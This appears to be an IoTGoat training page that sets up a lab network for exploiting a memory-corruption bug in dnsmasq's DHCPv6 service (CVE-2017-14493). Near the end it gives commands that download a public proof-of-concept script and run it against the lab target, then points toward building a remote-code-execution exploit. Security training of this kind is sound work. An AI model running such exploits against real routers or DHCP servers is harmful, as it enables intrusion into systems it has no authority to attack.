Dnsmasq exercise setup
Dnsmasq is a popular open-source lightweight DNS forwarder and DHCP server used in IoTGoat's firmware. The installed Dnsmasq package (version 2.7.3) contains several vulnerabilities although this page describes environmental setup to exploit memory corruption vulnerabilities such as CVE-2017-14493 in a controlled environment. For additional details regarding Dnsmasq vulnerabilities and exploits, see Google Security's blog post Behind the Masq: Yet more DNS, and DHCP, vulnerabilities
IoTGoat’s virtual machine is connected to the Host via a NAT network by default, illustrated in the image below. The Host Machine provides an IP address via DHCP to IoTGoat. Thus, the network connection including internet access to the VM is provided by the Host Machine.
To perform dnsmasq memory corruption attacks, we will exploit the DHCPv6 service of dnsmasq demonstrated in CVE-2017-14493. This requires the DHCPv6 service to be enabled within IoTGoat which will be used to distribute IP addresses in this exercise.
To do so, a custom subnet (network) simulating a LAN behind IoTGoat will need to be configured. IoTGoat will serve the vulnerable dnsmasq DHCP service and give out IP addresses to VMs connected to the custom network, similar to how a normal router would behave. The following image shows the IoTGoat setup to the left with two hosts that are receiving IP addresses on the same virtual network while the right side provides a typical home internet environment.
A typical home router is connected to the internet via an ISP (Internet Service Provider) on it’s WAN interface. Similarly, the Host Machine will also act as the ISP for IoTGoat as it provides internet to it’s WAN interface. Devices within the virtual network can access IoTGoat via the default IP address of 192.168.99.1 or IPv6 address - fdca:1:2:3:4::1234. Subsequent sections will provide walkthroughs for preparing the virtual network and IoTGoat configurations.
- Create a custom network.
- Add 2 Network adapters to IoTGoat.
In your virtualization software (VMWare, Virtualbox, etc.), create a custom network that can be used by IoTGoat as its LAN interface. The network should have the following specifications:
- Disable DHCP for this subnet (IoTGoat will provide DHCP services).
- Enable VMs on the network to connect to external networks (allows access to the internet)
- Disallow connecting the host to the virtual network
See the following links and associated images for further assistance with configuring such settings on popular virtualization platforms.
- VMWare Fusion (top left) ****
- Select Preferences
- Select Network
- Click the 🔒button and authenticate to make changes
- Click “+” sign to add a net virtual network interface
- Check the “Allow virtual machines on this network to connect to external networks (Using NAT) box
Reference: Creating Custom Networks
Reference: Add a Host-Only Virtual Network
Reference:How to create multiple NAT Networks in VirtualBox
The attacker machine will be simulated by another VM connected to IoTGoat's virtual network interface (vmnet3 in this case) configured in the previous section. Refer to the example configuration in the following image.
The attacker computer should receive an IPv4 and an IPv6 address from IoTGoat as highlighted in the following image.
Two Network adapters must be created within the IoTGoat virtual machine (Select the “Add Device” and choose the “Network Adapter” device to add).
The first network adapter is supposed to be connected to the custom network that we created (vmnet3 in the image above).
The second network adapter must be connected to the host machine via NAT.
The next step is network configurations on the IoTGoat VM. Specifically, static IPs will be assigned and dnsmasq will be configured to serve IPv4 and IPv6 addresses via DHCP, to the hosts connected to IoTGoat.
A Dnsmasq setup script is available for performing the required changes. The script can be executed from the root folder,
refer to the examples provided below. To revert back to the original settings, execute the script with the -d default flag.
root@IoTGoat:/# ./dnsmasq_setup.sh
#############
Please ensure Dnsmasq network setup has been followed. See https://tinyurl.com/dnsmasq
To set back to default, use -d default
Usage: sh ./dnsmasq_setup.sh
#############
wl0(mac80211): Interface type not supported
Command failed: Not found
Command failed: Not found
wl0(mac80211): Interface type not supported
[+] Done!
root@IoTGoat:/# ./dnsmasq_setup.sh -d default
#############
Please ensure Dnsmasq network setup has been followed. See https://tinyurl.com/dnsmasq
To set back to default, use -d default
Usage: sh ./dnsmasq_setup.sh
#############
Setting network configs back to default
[+] Done!
Instructions to execute the PoC attack are provided in Google's security research repository. Refer to CVE-2017-14493-instructions.txt and CVE-2017-14493.py for this exercise. For simplicity, download the raw Python script (CVE-2017-14493.py) via wget, and execute it to send the payload targeting IoTGoat's statically configured IPv6 address at port 547 as shown below.
$ wget https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
$ python CVE-2017-14493.py fdca:1:2:3:4::1234 547
[+] sending 120 bytes to fdca:1:2:3:4::1234:547
The following image shows the crash behavior from IoTGoat.
With the vulnerability (CVE-2017-14493) successfully verified, proceed with developing a working exploit to perform remote code execution.